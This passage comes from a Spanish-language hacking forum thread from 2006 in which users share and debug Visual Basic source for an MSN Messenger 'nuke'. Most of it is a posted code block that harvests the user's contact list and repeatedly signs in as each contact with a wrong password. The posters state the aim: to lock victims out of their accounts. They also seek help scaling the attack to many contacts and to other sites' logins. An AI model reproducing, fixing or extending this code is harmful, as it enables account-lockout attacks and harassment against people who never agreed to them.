elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  codigo fuente de un nuke para msn
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] Ir Abajo Respuesta Imprimir
Autor Tema: codigo fuente de un nuke para msn  (Leído 8,207 veces)
satanico88

Desconectado Desconectado

Mensajes: 43


Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #20 en: 20 Marzo 2006, 00:23 am »

te reporto k es

Public WithEvents MSN As MessengerAPI.Messenger
Set MSN = New MessengerAPI.Messenger

saludos

si pongo eso no me avre el exe.. y si lo poneo asi

Public WithEvents MSN As MessengerAPI

me avre el msn de windows..


En línea

Kpax


Desconectado Desconectado

Mensajes: 316



Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #21 en: 20 Marzo 2006, 00:43 am »

en realidad no es muy importante cual msn abre , se supone k la victima no podra abror el msn de todas formas

saludos

p.d.  ayudenme a perfeccionar el code para varios contacs



En línea

En este mundo una de dos
Kpax


Desconectado Desconectado

Mensajes: 316



Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #22 en: 20 Marzo 2006, 00:48 am »

pero si en vez de negar msn ... se genera el code para k lo haga con las sesiones de inicion de una pag web cualkiera???

sucederia algo'

En línea

En este mundo una de dos
Kpax


Desconectado Desconectado

Mensajes: 316



Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #23 en: 20 Marzo 2006, 22:52 pm »

Este code esta mas avanzado...

recordar darle las referencias


Tengo un problema con el win messenger de windows.

saludos


Código:
Dim t1 As Integer
Dim t2 As Integer
Dim flage As Boolean

Public WithEvents MSN As MessengerAPI.MessengerNative
Public WithEvents MsgrUIA As MessengerAPI.Messenger
Private Sub Wait(ByVal nSec As Integer)
    'Esperar un número de segundos
    Dim t1 As Date, t2 As Date

    t1 = Second(Now)
    t2 = t1 + nSec
    Do
        DoEvents
    Loop While t2 > Second(Now)
End Sub


Private Sub Command1_Click()

t1 = 0
t2 = 0
Dim password As String
Dim usuario As String
Dim flage As Boolean

password = "hola"

 x = 2
 flage = False
 t2 = 0
 usuario = List1.List(0)
 
 While (t2 < 1000)
  MSN.Signin 0, usuario, password
  'For t1 = 0 To 20
  SendKeys "{tab}"
  SendKeys "{tab}"
  SendKeys "{tab}"
  SendKeys "{tab}"
  SendKeys "{tab}"
  SendKeys "{tab}"
  SendKeys usuario
  SendKeys "{tab}"
  SendKeys password
  SendKeys "{enter}"
  Wait (2)
  'Next t1
  Label1.Caption = usuario
  t2 = t2 + 1
  usuario = List1.List(t2 Mod x)
 Wend

End Sub

Private Sub Command2_Click()
flage = False
End Sub

Private Sub Form_Load()
Set MSN = New MessengerAPI.MessengerNative
Set MsgrUIA = New MessengerAPI.Messenger
Dim user As IMessengerContact 'Declaramos la variable user como contacto del mssenger

For Each user In MsgrUIA.MyContacts 'Por cada usuario en la lista de contactos si esta conectado en linea, ausente, no disponible, etcetera. agrega cada direccion de correo a la list1
If Not (user.Status = MISTATUS_ONLINE Or user.Status = MISTATUS_AWAY Or user.Status = MISTATUS_BE_RIGHT_BACK Or user.Status = MISTATUS_BUSY Or user.Status = MISTATUS_IDLE Or user.Status = MISTATUS_ON_THE_PHONE Or user.Status = MISTATUS_OUT_TO_LUNCH) Then
List1.AddItem user.SigninName 'tb podriamos hacer esto con el nick colocando user.friendlyname
End If
Next
Timer1.Enabled = False
End Sub


 

ademas se trunca en determinada parte del code ...
espero mas aportes


En línea

En este mundo una de dos
Robokop


Desconectado Desconectado

Mensajes: 1.660



Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #24 en: 20 Marzo 2006, 23:08 pm »

pues ami me sigue sin arrancar y agrego todas las referencias del messenger 
En línea

Kpax


Desconectado Desconectado

Mensajes: 316



Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #25 en: 21 Marzo 2006, 00:45 am »

oopppss

me olvide decir k para k capturen los contactos deben tener abierto el msn (el actual 7.5)

El atake se realiza por el msn de windows...


saludos y espero mas respuestas
En línea

En este mundo una de dos
Kpax


Desconectado Desconectado

Mensajes: 316



Ver Perfil
Re: codigo fuente de un nuke para msn
« Respuesta #26 en: 21 Marzo 2006, 00:53 am »

bueno decri tambien k añadir el

1 textbox como text1
2 command button command1 y command2
un timer//k esta sobrando

y nada mas son 3 referencias de las API

saludos


 

En línea

En este mundo una de dos
Páginas: 1 2 [3] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
WLAN_AUDIT para Iphone y su codigo fuente
Hacking Mobile
ChimoC 0 6,145 Último mensaje 9 Marzo 2011, 09:50 am
por ChimoC
Intel abre el código fuente de su tecnología 3D para internet
Noticias
wolfbcn 1 1,912 Último mensaje 9 Junio 2011, 07:25 am
por Nakp
OS DEJO UN CODIGO FUENTE ¿ QUE PONGO EN MI WEB PARA QUE SE VEA EL VIDEO?
Dudas Generales
gemagra 1 3,274 Último mensaje 12 Marzo 2012, 18:41 pm
por el-brujo
Código de fuente, modificar para ver respuestas
Dudas Generales
5ant1ag094 1 9,281 Último mensaje 8 Marzo 2013, 23:22 pm
por ‭lipman
Codigo fuente para bloquear el internet
Programación C/C++
crlos20 3 2,544 Último mensaje 28 Enero 2014, 19:23 pm
por x64core
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines